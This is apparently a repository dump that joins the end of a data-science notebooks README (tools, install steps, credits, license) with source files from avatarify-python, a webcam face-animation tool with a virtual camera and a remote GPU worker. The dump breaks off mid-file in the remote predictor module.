of the Python programming language for large-scale data processing, predictive analytics, and scientific computing, that aims to simplify package management and deployment. | | [ipython notebook](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#ipython-notebook) | Web-based interactive computational environment where you can combine code execution, text, mathematics, plots and rich media into a single document. | | [git](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#git) | Distributed revision control system with an emphasis on speed, data integrity, and support for distributed, non-linear workflows. | | [ruby](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#ruby) | Used to interact with the AWS command line and for Jekyll, a blog framework that can be hosted on GitHub Pages. | | [jekyll](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#jekyll) | Simple, blog-aware, static site generator for personal, project, or organization sites. Renders Markdown or Textile and Liquid templates, and produces a complete, static website ready to be served by Apache HTTP Server, Nginx or another web server. | | [pelican](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#pelican) | Python-based alternative to Jekyll. | | [django](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#django) | High-level Python Web framework that encourages rapid development and clean, pragmatic design. It can be useful to share reports/analyses and for blogging. Lighter-weight alternatives include [Pyramid](https://github.com/Pylons/pyramid), [Flask](https://github.com/pallets/flask), [Tornado](https://github.com/tornadoweb/tornado), and [Bottle](https://github.com/bottlepy/bottle). ## misc IPython Notebook(s) demonstrating miscellaneous functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [regex](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/misc/regex.ipynb) | Regular expression cheat sheet useful in data wrangling.| [algorithmia](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/misc/Algorithmia.ipynb) | Algorithmia is a marketplace for algorithms. This notebook showcases 4 different algorithms: Face Detection, Content Summarizer, Latent Dirichlet Allocation and Optical Character Recognition.| ## notebook-installation ### anaconda Anaconda is a free distribution of the Python programming language for large-scale data processing, predictive analytics, and scientific computing that aims to simplify package management and deployment. Follow instructions to install [Anaconda](https://docs.continuum.io/anaconda/install) or the more lightweight [miniconda](http://conda.pydata.org/miniconda.html). ### dev-setup For detailed instructions, scripts, and tools to set up your development environment for data analysis, check out the [dev-setup](https://github.com/donnemartin/dev-setup) repo. ### running-notebooks To view interactive content or to modify elements within the IPython notebooks, you must first clone or download the repository then run the notebook. More information on IPython Notebooks can be found [here.](http://ipython.org/notebook.html) $ git clone https://github.com/donnemartin/data-science-ipython-notebooks.git $ cd data-science-ipython-notebooks $ jupyter notebook Notebooks tested with Python 2.7.x. ## credits * [Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython](http://www.amazon.com/Python-Data-Analysis-Wrangling-IPython/dp/1449319793) by Wes McKinney * [PyCon 2015 Scikit-learn Tutorial](https://github.com/jakevdp/sklearn_pycon2015) by Jake VanderPlas * [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook) by Jake VanderPlas * [Parallel Machine Learning with scikit-learn and IPython](https://github.com/ogrisel/parallel_ml_tutorial) by Olivier Grisel * [Statistical Interference Using Computational Methods in Python](https://github.com/AllenDowney/CompStats) by Allen Downey * [TensorFlow Examples](https://github.com/aymericdamien/TensorFlow-Examples) by Aymeric Damien * [TensorFlow Tutorials](https://github.com/pkmital/tensorflow_tutorials) by Parag K Mital * [TensorFlow Tutorials](https://github.com/nlintz/TensorFlow-Tutorials) by Nathan Lintz * [TensorFlow Tutorials](https://github.com/alrojo/tensorflow-tutorial) by Alexander R Johansen * [TensorFlow Book](https://github.com/BinRoot/TensorFlow-Book) by Nishant Shukla * [Summer School 2015](https://github.com/mila-udem/summerschool2015) by mila-udem * [Keras tutorials](https://github.com/leriomaggio/deep-learning-keras-tensorflow) by Valerio Maggio * [Kaggle](https://www.kaggle.com/) * [Yhat Blog](http://blog.yhat.com/) ## contributing Contributions are welcome! For bug reports or requests please [submit an issue](https://github.com/donnemartin/data-science-ipython-notebooks/issues). ## contact-info Feel free to contact me to discuss any issues, questions, or comments. * Email: [[email protected]](mailto:[email protected]) * Twitter: [@donne_martin](https://twitter.com/donne_martin) * GitHub: [donnemartin](https://github.com/donnemartin) * LinkedIn: [donnemartin](https://www.linkedin.com/in/donnemartin) * Website: [donnemartin.com](http://donnemartin.com) ## license This repository contains a variety of content; some developed by Donne Martin, and some from third-parties. The third-party content is distributed under the license provided by those parties. The content developed by Donne Martin is distributed under the following license: *I am providing code and resources in this repository to you under an open source license. Because this is my personal repository, the license you receive to my code and resources is from me and not my employer (Facebook).* Copyright 2015 Donne Martin Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
avatarify-python
862182cfbca5bd8a7473bed9c5f69f92e8d5cc7b
File: afy/arguments.py from argparse import ArgumentParser parser = ArgumentParser() parser.add_argument("--config", help="path to config") parser.add_argument("--checkpoint", default='vox-cpk.pth.tar', help="path to checkpoint to restore") parser.add_argument("--relative", dest="relative", action="store_true", help="use relative or absolute keypoint coordinates") parser.add_argument("--adapt_scale", dest="adapt_scale", action="store_true", help="adapt movement scale based on convex hull of keypoints") parser.add_argument("--no-pad", dest="no_pad", action="store_true", help="don't pad output image") parser.add_argument("--enc_downscale", default=1, type=float, help="Downscale factor for encoder input. Improves performance with cost of quality.") parser.add_argument("--virt-cam", type=int, default=0, help="Virtualcam device ID") parser.add_argument("--no-stream", action="store_true", help="On Linux, force no streaming") parser.add_argument("--verbose", action="store_true", help="Print additional information") parser.add_argument("--hide-rect", action="store_true", default=False, help="Hide the helper rectangle in preview window") parser.add_argument("--avatars", default="./avatars", help="path to avatars directory") parser.add_argument("--is-worker", action="store_true", help="Whether to run this process as a remote GPU worker") parser.add_argument("--is-client", action="store_true", help="Whether to run this process as a client") parser.add_argument("--in-port", type=int, default=5557, help="Remote worker input port") parser.add_argument("--out-port", type=int, default=5558, help="Remote worker output port") parser.add_argument("--in-addr", type=str, default=None, help="Socket address for incoming messages, like example.com:5557") parser.add_argument("--out-addr", type=str, default=None, help="Socker address for outcoming messages, like example.com:5558") parser.add_argument("--jpg_quality", type=int, default=95, help="Jpeg copression quality for image transmission") parser.set_defaults(relative=False) parser.set_defaults(adapt_scale=False) parser.set_defaults(no_pad=False) opt = parser.parse_args() if opt.is_client and (opt.in_addr is None or opt.out_addr is None): raise ValueError("You have to set --in-addr and --out-addr") File: afy/cam_fomm.py import os, sys from sys import platform as _platform import glob import yaml import time import requests import numpy as np import cv2 from afy.videocaptureasync import VideoCaptureAsync from afy.arguments import opt from afy.utils import info, Once, Tee, crop, pad_img, resize, TicToc import afy.camera_selector as cam_selector log = Tee('./var/log/cam_fomm.log') # Where to split an array from face_alignment to separate each landmark LANDMARK_SLICE_ARRAY = np.array([17, 22, 27, 31, 36, 42, 48, 60]) if _platform == 'darwin': if not opt.is_client: info('\nOnly remote GPU mode is supported for Mac (use --is-client and --connect options to connect to the server)') info('Standalone version will be available lately!\n') exit() def is_new_frame_better(source, driving, predictor): global avatar_kp global display_string if avatar_kp is None: display_string = "No face detected in avatar." return False if predictor.get_start_frame() is None: display_string = "No frame to compare to." return True driving_smaller = resize(driving, (128, 128))[..., :3] new_kp = predictor.get_frame_kp(driving) if new_kp is not None: new_norm = (np.abs(avatar_kp - new_kp) ** 2).sum() old_norm = (np.abs(avatar_kp - predictor.get_start_frame_kp()) ** 2).sum() out_string = "{0} : {1}".format(int(new_norm * 100), int(old_norm * 100)) display_string = out_string log(out_string) return new_norm < old_norm else: display_string = "No face found!" return False def load_stylegan_avatar(): url = "https://thispersondoesnotexist.com/image" r = requests.get(url, headers={'User-Agent': "My User Agent 1.0"}).content image = np.frombuffer(r, np.uint8) image = cv2.imdecode(image, cv2.IMREAD_COLOR) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = resize(image, (IMG_SIZE, IMG_SIZE)) return image def load_images(IMG_SIZE = 256): avatars = [] filenames = [] images_list = sorted(glob.glob(f'{opt.avatars}/*')) for i, f in enumerate(images_list): if f.endswith('.jpg') or f.endswith('.jpeg') or f.endswith('.png'): img = cv2.imread(f) if img is None: log("Failed to open image: {}".format(f)) continue if img.ndim == 2: img = np.tile(img[..., None], [1, 1, 3]) img = img[..., :3][..., ::-1] img = resize(img, (IMG_SIZE, IMG_SIZE)) avatars.append(img) filenames.append(f) return avatars, filenames def change_avatar(predictor, new_avatar): global avatar, avatar_kp, kp_source avatar_kp = predictor.get_frame_kp(new_avatar) kp_source = None avatar = new_avatar predictor.set_source_image(avatar) def draw_rect(img, rw=0.6, rh=0.8, color=(255, 0, 0), thickness=2): h, w = img.shape[:2] l = w * (1 - rw) // 2 r = w - l u = h * (1 - rh) // 2 d = h - u img = cv2.rectangle(img, (int(l), int(u)), (int(r), int(d)), color, thickness) def kp_to_pixels(arr): '''Convert normalized landmark locations to screen pixels''' return ((arr + 1) * 127).astype(np.int32) def draw_face_landmarks(img, face_kp, color=(20, 80, 255)): if face_kp is not None: img = cv2.polylines(img, np.split(kp_to_pixels(face_kp), LANDMARK_SLICE_ARRAY), False, color) def print_help(): info('\n\n=== Control keys ===') info('1-9: Change avatar') for i, fname in enumerate(avatar_names): key = i + 1 name = fname.split('/')[-1] info(f'{key}: {name}') info('W: Zoom camera in') info('S: Zoom camera out') info('A: Previous avatar in folder') info('D: Next avatar in folder') info('Q: Get random avatar') info('X: Calibrate face pose') info('I: Show FPS') info('ESC: Quit') info('\nFull key list: https://github.com/alievk/avatarify#controls') info('\n\n') def draw_fps(frame, fps, timing, x0=10, y0=20, ystep=30, fontsz=0.5, color=(255, 255, 255)): frame = frame.copy() cv2.putText(frame, f"FPS: {fps:.1f}", (x0, y0 + ystep * 0), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Model time (ms): {timing['predict']:.1f}", (x0, y0 + ystep * 1), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Preproc time (ms): {timing['preproc']:.1f}", (x0, y0 + ystep * 2), 0, fontsz * IMG_SIZE / 256, color, 1) cv2.putText(frame, f"Postproc time (ms): {timing['postproc']:.1f}", (x0, y0 + ystep * 3), 0, fontsz * IMG_SIZE / 256, color, 1) return frame def draw_landmark_text(frame, thk=2, fontsz=0.5, color=(0, 0, 255)): frame = frame.copy() cv2.putText(frame, "ALIGN FACES", (60, 20), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "THEN PRESS X", (60, 245), 0, fontsz * IMG_SIZE / 255, color, thk) return frame def draw_calib_text(frame, thk=2, fontsz=0.5, color=(0, 0, 255)): frame = frame.copy() cv2.putText(frame, "FIT FACE IN RECTANGLE", (40, 20), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "W - ZOOM IN", (60, 40), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "S - ZOOM OUT", (60, 60), 0, fontsz * IMG_SIZE / 255, color, thk) cv2.putText(frame, "THEN PRESS X", (60, 245), 0, fontsz * IMG_SIZE / 255, color, thk) return frame def select_camera(config): cam_config = config['cam_config'] cam_id = None if os.path.isfile(cam_config): with open(cam_config, 'r') as f: cam_config = yaml.load(f, Loader=yaml.FullLoader) cam_id = cam_config['cam_id'] else: cam_frames = cam_selector.query_cameras(config['query_n_cams']) if cam_frames: if len(cam_frames) == 1: cam_id = list(cam_frames)[0] else: cam_id = cam_selector.select_camera(cam_frames, window="CLICK ON YOUR CAMERA") log(f"Selected camera {cam_id}") with open(cam_config, 'w') as f: yaml.dump({'cam_id': cam_id}, f) else: log("No cameras are available") return cam_id if __name__ == "__main__": with open('config.yaml', 'r') as f: config = yaml.load(f, Loader=yaml.FullLoader) global display_string display_string = "" IMG_SIZE = 256 log('Loading Predictor') predictor_args = { 'config_path': opt.config, 'checkpoint_path': opt.checkpoint, 'relative': opt.relative, 'adapt_movement_scale': opt.adapt_scale, 'enc_downscale': opt.enc_downscale } if opt.is_worker: from afy import predictor_worker predictor_worker.run_worker(opt.in_port, opt.out_port) sys.exit(0) elif opt.is_client: from afy import predictor_remote try: predictor = predictor_remote.PredictorRemote( in_addr=opt.in_addr, out_addr=opt.out_addr, **predictor_args ) except ConnectionError as err: log(err) sys.exit(1) predictor.start() else: from afy import predictor_local predictor = predictor_local.PredictorLocal( **predictor_args ) cam_id = select_camera(config) if cam_id is None: exit(1) cap = VideoCaptureAsync(cam_id) cap.start() avatars, avatar_names = load_images() enable_vcam = not opt.no_stream ret, frame = cap.read() stream_img_size = frame.shape[1], frame.shape[0] if enable_vcam: if _platform in ['linux', 'linux2']: try: import pyfakewebcam except ImportError: log("pyfakewebcam is not installed.") exit(1) stream = pyfakewebcam.FakeWebcam(f'/dev/video{opt.virt_cam}', *stream_img_size) else: enable_vcam = False # log("Virtual camera is supported only on Linux.") # if not enable_vcam: # log("Virtual camera streaming will be disabled.") cur_ava = 0 avatar = None change_avatar(predictor, avatars[cur_ava]) passthrough = False cv2.namedWindow('cam', cv2.WINDOW_GUI_NORMAL) cv2.moveWindow('cam', 500, 250) frame_proportion = 0.9 frame_offset_x = 0 frame_offset_y = 0 overlay_alpha = 0.0 preview_flip = False output_flip = False find_keyframe = False is_calibrated = False show_landmarks = False fps_hist = [] fps = 0 show_fps = False print_help() try: while True: tt = TicToc() timing = { 'preproc': 0, 'predict': 0, 'postproc': 0 } green_overlay = False tt.tic() ret, frame = cap.read() if not ret: log("Can't receive frame (stream end?). Exiting ...") break frame = frame[..., ::-1] frame_orig = frame.copy() frame, (frame_offset_x, frame_offset_y) = crop(frame, p=frame_proportion, offset_x=frame_offset_x, offset_y=frame_offset_y) frame = resize(frame, (IMG_SIZE, IMG_SIZE))[..., :3] if find_keyframe: if is_new_frame_better(avatar, frame, predictor): log("Taking new frame!") green_overlay = True predictor.reset_frames() timing['preproc'] = tt.toc() if passthrough: out = frame elif is_calibrated: tt.tic() out = predictor.predict(frame) if out is None: log('predict returned None') timing['predict'] = tt.toc() else: out = None tt.tic() key = cv2.waitKey(1) if cv2.getWindowProperty('cam', cv2.WND_PROP_VISIBLE) < 1.0: break elif is_calibrated and cv2.getWindowProperty('avatarify', cv2.WND_PROP_VISIBLE) < 1.0: break if key == 27: # ESC break elif key == ord('d'): cur_ava += 1 if cur_ava >= len(avatars): cur_ava = 0 passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == ord('a'): cur_ava -= 1 if cur_ava < 0: cur_ava = len(avatars) - 1 passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == ord('w'): frame_proportion -= 0.05 frame_proportion = max(frame_proportion, 0.1) elif key == ord('s'): frame_proportion += 0.05 frame_proportion = min(frame_proportion, 1.0) elif key == ord('H'): frame_offset_x -= 1 elif key == ord('h'): frame_offset_x -= 5 elif key == ord('K'): frame_offset_x += 1 elif key == ord('k'): frame_offset_x += 5 elif key == ord('J'): frame_offset_y -= 1 elif key == ord('j'): frame_offset_y -= 5 elif key == ord('U'): frame_offset_y += 1 elif key == ord('u'): frame_offset_y += 5 elif key == ord('Z'): frame_offset_x = 0 frame_offset_y = 0 frame_proportion = 0.9 elif key == ord('x'): predictor.reset_frames() if not is_calibrated: cv2.namedWindow('avatarify', cv2.WINDOW_GUI_NORMAL) cv2.moveWindow('avatarify', 600, 250) is_calibrated = True show_landmarks = False elif key == ord('z'): overlay_alpha = max(overlay_alpha - 0.1, 0.0) elif key == ord('c'): overlay_alpha = min(overlay_alpha + 0.1, 1.0) elif key == ord('r'): preview_flip = not preview_flip elif key == ord('t'): output_flip = not output_flip elif key == ord('f'): find_keyframe = not find_keyframe elif key == ord('o'): show_landmarks = not show_landmarks elif key == ord('q'): try: log('Loading StyleGAN avatar...') avatar = load_stylegan_avatar() passthrough = False change_avatar(predictor, avatar) except: log('Failed to load StyleGAN avatar') elif key == ord('l'): try: log('Reloading avatars...') avatars, avatar_names = load_images() passthrough = False log("Images reloaded") except: log('Image reload failed') elif key == ord('i'): show_fps = not show_fps elif 48 < key < 58: cur_ava = min(key - 49, len(avatars) - 1) passthrough = False change_avatar(predictor, avatars[cur_ava]) elif key == 48: passthrough = not passthrough elif key != -1: log(key) if overlay_alpha > 0: preview_frame = cv2.addWeighted( avatar, overlay_alpha, frame, 1.0 - overlay_alpha, 0.0) else: preview_frame = frame.copy() if show_landmarks: # Dim the background to make it easier to see the landmarks preview_frame = cv2.convertScaleAbs(preview_frame, alpha=0.5, beta=0.0) draw_face_landmarks(preview_frame, avatar_kp, (200, 20, 10)) frame_kp = predictor.get_frame_kp(frame) draw_face_landmarks(preview_frame, frame_kp) if preview_flip: preview_frame = cv2.flip(preview_frame, 1) if green_overlay: green_alpha = 0.8 overlay = preview_frame.copy() overlay[:] = (0, 255, 0) preview_frame = cv2.addWeighted( preview_frame, green_alpha, overlay, 1.0 - green_alpha, 0.0) timing['postproc'] = tt.toc() if find_keyframe: preview_frame = cv2.putText(preview_frame, display_string, (10, 220), 0, 0.5 * IMG_SIZE / 256, (255, 255, 255), 1) if show_fps: preview_frame = draw_fps(preview_frame, fps, timing) if not is_calibrated: preview_frame = draw_calib_text(preview_frame) elif show_landmarks: preview_frame = draw_landmark_text(preview_frame) if not opt.hide_rect: draw_rect(preview_frame) cv2.imshow('cam', preview_frame[..., ::-1]) if out is not None: if not opt.no_pad: out = pad_img(out, stream_img_size) if output_flip: out = cv2.flip(out, 1) if enable_vcam: out = resize(out, stream_img_size) stream.schedule_frame(out) cv2.imshow('avatarify', out[..., ::-1]) fps_hist.append(tt.toc(total=True)) if len(fps_hist) == 10: fps = 10 / (sum(fps_hist) / 1000) fps_hist = [] except KeyboardInterrupt: log("main: user interrupt") log("stopping camera") cap.stop() cv2.destroyAllWindows() if opt.is_client: log("stopping remote predictor") predictor.stop() log("main: exit") File: afy/videocaptureasync.py # https://github.com/gilbertfrancois/video-capture-async import threading import cv2 import time WARMUP_TIMEOUT = 10.0 class VideoCaptureAsync: def __init__(self, src=0, width=640, height=480): self.src = src self.cap = cv2.VideoCapture(self.src) if not self.cap.isOpened(): raise RuntimeError("Cannot open camera") self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height) self.grabbed, self.frame = self.cap.read() self.started = False self.read_lock = threading.Lock() def set(self, var1, var2): self.cap.set(var1, var2) def isOpened(self): return self.cap.isOpened() def start(self): if self.started: print('[!] Asynchronous video capturing has already been started.') return None self.started = True self.thread = threading.Thread(target=self.update, args=(), daemon=True) self.thread.start() # (warmup) wait for the first successfully grabbed frame warmup_start_time = time.time() while not self.grabbed: warmup_elapsed_time = (time.time() - warmup_start_time) if warmup_elapsed_time > WARMUP_TIMEOUT: raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.") time.sleep(0.5) return self def update(self): while self.started: grabbed, frame = self.cap.read() if not grabbed or frame is None or frame.size == 0: continue with self.read_lock: self.grabbed = grabbed self.frame = frame def read(self): while True: with self.read_lock: frame = self.frame.copy() grabbed = self.grabbed break return grabbed, frame def stop(self): self.started = False self.thread.join() def __exit__(self, exec_type, exc_value, traceback): self.cap.release() File: afy/networking.py import zmq import numpy as np import msgpack import msgpack_numpy as m m.patch() from afy.utils import log def check_connection(socket, timeout=1000): old_rcvtimeo = socket.RCVTIMEO socket.RCVTIMEO = timeout try: data = msgpack.packb(([], {})) socket.send_data('hello', data) attr_recv, data_recv = socket.recv_data() response = msgpack.unpackb(data_recv) except zmq.error.Again: return False finally: socket.RCVTIMEO = old_rcvtimeo log(f"Response to hello is {response}") return response == 'OK' class SerializingSocket(zmq.Socket): """Numpy array serialization methods. Based on https://github.com/jeffbass/imagezmq/blob/master/imagezmq/imagezmq.py#L291 Used for sending / receiving OpenCV images, which are Numpy arrays. Also used for sending / receiving jpg compressed OpenCV images. """ def send_array(self, A, msg='NoName', flags=0, copy=True, track=False): """Sends a numpy array with metadata and text message. Sends a numpy array with the metadata necessary for reconstructing the array (dtype,shape). Also sends a text msg, often the array or image name. Arguments: A: numpy array or OpenCV image. msg: (optional) array name, image name or text message. flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. """ md = dict( msg=msg, dtype=str(A.dtype), shape=A.shape, ) self.send_json(md, flags | zmq.SNDMORE) return self.send(A, flags, copy=copy, track=track) def send_data(self, msg='NoName', data=b'00', flags=0, copy=True, track=False): """Send a jpg buffer with a text message. Sends a jpg bytestring of an OpenCV image. Also sends text msg, often the image name. Arguments: msg: image name or text message. data: binary data to be sent. flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. """ md = dict(msg=msg, ) self.send_json(md, flags | zmq.SNDMORE) return self.send(data, flags, copy=copy, track=track) def recv_array(self, flags=0, copy=True, track=False): """Receives a numpy array with metadata and text message. Receives a numpy array with the metadata necessary for reconstructing the array (dtype,shape). Returns the array and a text msg, often the array or image name. Arguments: flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. Returns: msg: image name or text message. A: numpy array or OpenCV image reconstructed with dtype and shape. """ md = self.recv_json(flags=flags) msg = self.recv(flags=flags, copy=copy, track=track) A = np.frombuffer(msg, dtype=md['dtype']) return (md['msg'], A.reshape(md['shape'])) def recv_data(self, flags=0, copy=True, track=False): """Receives a jpg buffer and a text msg. Receives a jpg bytestring of an OpenCV image. Also receives a text msg, often the image name. Arguments: flags: (optional) zmq flags. copy: (optional) zmq copy flag. track: (optional) zmq track flag. Returns: msg: image name or text message. data: bytestring, containing data. """ md = self.recv_json(flags=flags) # metadata text data = self.recv(flags=flags, copy=copy, track=track) return (md['msg'], data) class SerializingContext(zmq.Context): _socket_class = SerializingSocket File: afy/utils.py import sys import time from collections import defaultdict import numpy as np import cv2 def log(*args, file=sys.stderr, **kwargs): time_str = f'{time.time():.6f}' print(f'[{time_str}]', *args, file=file, **kwargs) def info(*args, file=sys.stdout, **kwargs): print(*args, file=file, **kwargs) class Tee(object): def __init__(self, filename, mode='w', terminal=sys.stderr): self.file = open(filename, mode, buffering=1) self.terminal = terminal def __del__(self): self.file.close() def write(self, *args, **kwargs): log(*args, file=self.file, **kwargs) log(*args, file=self.terminal, **kwargs) def __call__(self, *args, **kwargs): return self.write(*args, **kwargs) def flush(self): self.file.flush() class Logger(): def __init__(self, filename, verbose=True): self.tee = Tee(filename) self.verbose = verbose def __call__(self, *args, important=False, **kwargs): if not self.verbose and not important: return self.tee(*args, **kwargs) class Once(): _id = {} def __init__(self, what, who=log, per=1e12): """ Do who(what) once per seconds. what: args for who who: callable per: frequency in seconds. """ assert callable(who) now = time.time() if what not in Once._id or now - Once._id[what] > per: who(what) Once._id[what] = now class TicToc: def __init__(self): self.t = None self.t_init = time.time() def tic(self): self.t = time.time() def toc(self, total=False): if total: return (time.time() - self.t_init) * 1000 assert self.t, 'You forgot to call tic()' return (time.time() - self.t) * 1000 def tocp(self, str): t = self.toc() log(f"{str} took {t:.4f}ms") return t class AccumDict: def __init__(self, num_f=3): self.d = defaultdict(list) self.num_f = num_f def add(self, k, v): self.d[k] += [v] def __dict__(self): return self.d def __getitem__(self, key): return self.d[key] def __str__(self): s = '' for k in self.d: if not self.d[k]: continue cur = self.d[k][-1] avg = np.mean(self.d[k]) format_str = '{:.%df}' % self.num_f cur_str = format_str.format(cur) avg_str = format_str.format(avg) s += f'{k} {cur_str} ({avg_str})\t\t' return s def __repr__(self): return self.__str__() def clamp(value, min_value, max_value): return max(min(value, max_value), min_value) def crop(img, p=0.7, offset_x=0, offset_y=0): h, w = img.shape[:2] x = int(min(w, h) * p) l = (w - x) // 2 r = w - l u = (h - x) // 2 d = h - u offset_x = clamp(offset_x, -l, w - r) offset_y = clamp(offset_y, -u, h - d) l += offset_x r += offset_x u += offset_y d += offset_y return img[u:d, l:r], (offset_x, offset_y) def pad_img(img, target_size, default_pad=0): sh, sw = img.shape[:2] w, h = target_size pad_w, pad_h = default_pad, default_pad if w / h > 1: pad_w += int(sw * (w / h) - sw) // 2 else: pad_h += int(sh * (h / w) - sh) // 2 out = np.pad(img, [[pad_h, pad_h], [pad_w, pad_w], [0,0]], 'constant') return out def resize(img, size, version='cv'): return cv2.resize(img, size) File: afy/predictor_local.py from scipy.spatial import ConvexHull import torch import yaml from modules.keypoint_detector import KPDetector from modules.generator_optim import OcclusionAwareGenerator from sync_batchnorm import DataParallelWithCallback import numpy as np import face_alignment def normalize_kp(kp_source, kp_driving, kp_driving_initial, adapt_movement_scale=False, use_relative_movement=False, use_relative_jacobian=False): if adapt_movement_scale: source_area = ConvexHull(kp_source['value'][0].data.cpu().numpy()).volume driving_area = ConvexHull(kp_driving_initial['value'][0].data.cpu().numpy()).volume adapt_movement_scale = np.sqrt(source_area) / np.sqrt(driving_area) else: adapt_movement_scale = 1 kp_new = {k: v for k, v in kp_driving.items()} if use_relative_movement: kp_value_diff = (kp_driving['value'] - kp_driving_initial['value']) kp_value_diff *= adapt_movement_scale kp_new['value'] = kp_value_diff + kp_source['value'] if use_relative_jacobian: jacobian_diff = torch.matmul(kp_driving['jacobian'], torch.inverse(kp_driving_initial['jacobian'])) kp_new['jacobian'] = torch.matmul(jacobian_diff, kp_source['jacobian']) return kp_new def to_tensor(a): return torch.tensor(a[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2) / 255 class PredictorLocal: def __init__(self, config_path, checkpoint_path, relative=False, adapt_movement_scale=False, device=None, enc_downscale=1): self.device = device or ('cuda' if torch.cuda.is_available() else 'cpu') self.relative = relative self.adapt_movement_scale = adapt_movement_scale self.start_frame = None self.start_frame_kp = None self.kp_driving_initial = None self.config_path = config_path self.checkpoint_path = checkpoint_path self.generator, self.kp_detector = self.load_checkpoints() self.fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, flip_input=True, device=self.device) self.source = None self.kp_source = None self.enc_downscale = enc_downscale def load_checkpoints(self): with open(self.config_path) as f: config = yaml.load(f, Loader=yaml.FullLoader) generator = OcclusionAwareGenerator(**config['model_params']['generator_params'], **config['model_params']['common_params']) generator.to(self.device) kp_detector = KPDetector(**config['model_params']['kp_detector_params'], **config['model_params']['common_params']) kp_detector.to(self.device) checkpoint = torch.load(self.checkpoint_path, map_location=self.device) generator.load_state_dict(checkpoint['generator']) kp_detector.load_state_dict(checkpoint['kp_detector']) generator.eval() kp_detector.eval() return generator, kp_detector def reset_frames(self): self.kp_driving_initial = None def set_source_image(self, source_image): self.source = to_tensor(source_image).to(self.device) self.kp_source = self.kp_detector(self.source) if self.enc_downscale > 1: h, w = int(self.source.shape[2] / self.enc_downscale), int(self.source.shape[3] / self.enc_downscale) source_enc = torch.nn.functional.interpolate(self.source, size=(h, w), mode='bilinear') else: source_enc = self.source self.generator.encode_source(source_enc) def predict(self, driving_frame): assert self.kp_source is not None, "call set_source_image()" with torch.no_grad(): driving = to_tensor(driving_frame).to(self.device) if self.kp_driving_initial is None: self.kp_driving_initial = self.kp_detector(driving) self.start_frame = driving_frame.copy() self.start_frame_kp = self.get_frame_kp(driving_frame) kp_driving = self.kp_detector(driving) kp_norm = normalize_kp(kp_source=self.kp_source, kp_driving=kp_driving, kp_driving_initial=self.kp_driving_initial, use_relative_movement=self.relative, use_relative_jacobian=self.relative, adapt_movement_scale=self.adapt_movement_scale) out = self.generator(self.source, kp_source=self.kp_source, kp_driving=kp_norm) out = np.transpose(out['prediction'].data.cpu().numpy(), [0, 2, 3, 1])[0] out = (np.clip(out, 0, 1) * 255).astype(np.uint8) return out def get_frame_kp(self, image): kp_landmarks = self.fa.get_landmarks(image) if kp_landmarks: kp_image = kp_landmarks[0] kp_image = self.normalize_alignment_kp(kp_image) return kp_image else: return None @staticmethod def normalize_alignment_kp(kp): kp = kp - kp.mean(axis=0, keepdims=True) area = ConvexHull(kp[:, :2]).volume area = np.sqrt(area) kp[:, :2] = kp[:, :2] / area return kp def get_start_frame(self): return self.start_frame def get_start_frame_kp(self): return self.start_frame_kp File: afy/predictor_remote.py from arguments import opt from networking import SerializingContext, check_connection from utils import Logger, TicToc, AccumDict, Once import multiprocessing as mp import queue import cv2 import numpy as np import zmq import msgpack import msgpack_numpy as m m.patch() PUT_TIMEOUT = 0.1 # s GET_TIMEOUT = 0.1 # s RECV_TIMEOUT = 1000 # ms QUEUE_SIZE = 100 class PredictorRemote: def __init__(self, *args, in_addr=None, out_addr=None, **kwargs): self.in_addr = in_addr self.out_addr = out_addr self.predictor_args = (args, kwargs) self.timing = AccumDict() self.log = Logger('./var/log/predictor_remote.log', verbose=opt.verbose) self.send_queue = mp.Queue(QUEUE_SIZE) self.recv_queue = mp.Queue(QUEUE_SIZE) self.worker_alive = mp.Value('i', 0) self.send_process = mp.Process( target=self.send_worker, args=(self.in_addr, self.send_queue, self.worker_alive), name="send_process" ) self.recv_process = mp.Process( target=self.recv_worker, args=(self.out_addr, self.recv_queue, self.worker_alive), name="recv_process" ) self._i_msg = -1 def start(self): self.worker_alive.value = 1 self.send_process.start() self.recv_process.start() self.init_remote_worker() def stop(self): self.worker_alive.value = 0 self.log("join worker processes...") self.send_process.join(timeout=5) self.recv_process.join(timeout=5) self.send_process.terminate() self.recv_process.terminate() def init_remote_worker(self): return self._send_recv_async('__init__', self.predictor_args, critical=True) def __getattr__(self, attr): is_critical = 